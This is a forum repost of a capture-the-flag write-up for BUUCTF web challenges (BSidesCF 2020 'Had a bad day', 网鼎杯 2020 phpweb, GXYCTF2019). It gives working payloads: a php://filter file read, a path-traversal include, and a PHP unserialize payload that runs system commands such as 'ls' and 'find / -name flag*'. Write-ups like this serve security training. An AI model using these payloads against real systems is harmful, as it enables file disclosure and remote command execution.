ToB企服应用市场:ToB评测及商务社交产业平台
标题:
BUUCTF-WEB(36-40)
[打印本页]
作者:
温锦文欧普厨电及净水器总代理
时间:
2024-5-26 17:17
标题:
BUUCTF-WEB(36-40)
[BSidesCF 2020]Had a bad day
参考:
[BUUCTF:
BSidesCF 2020]Had a bad day_末初的技术博客_51CTO博客
[buuctf-
BSidesCF 2020]Had a bad day(小宇特详解)-CSDN博客
应该是文件包含
我这里利用;1,然后报错,我发现他是直接会加上一个.php,那我们试试伪协议读取
?category=php://filter/read=convert.base64-encode/resource=index
复制代码
base64解码出
[/code]这个代码内里必须含有 woofers,meowers, index
然后我们就试着包含一下flag
[code]?category=meowers/../flag
复制代码
发现源码多了
那接下来我们就是读取,仍旧利用php://
php://filter/read=convert.base64-encode/woofers/resource=flag
复制代码
解码得到
[网鼎杯 2020 朱雀组]phpweb
参考:
v (cnblogs.com)
抓包发现还穿了这两个参数
然后发现是call_user_func()函数去下令执行
我们可以输入
func=file_get_contents&p=index.php
复制代码
去看这个代码的文件
可以构造反序列化
然后payload
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
复制代码
然后根目次也找不到flag,我们就用find,这里要url编码,然后用get传输,防止一些字符没用成功输入进去
<?php
class Test {
var $p = "find / -name flag*";
var $func = system;
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$a=new Test();
echo serialize($a);
复制代码
访问这个Starting前面这个/test.php
[GXYCTF2019]禁止套娃
开局就是天崩,没啥东西
dirsearch扫了一下也是没发现什么东西
有大概是git泄露,用githack试试
然后我这也扫描不到,挺奇怪的,这道题放一放
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)
Powered by Discuz! X3.4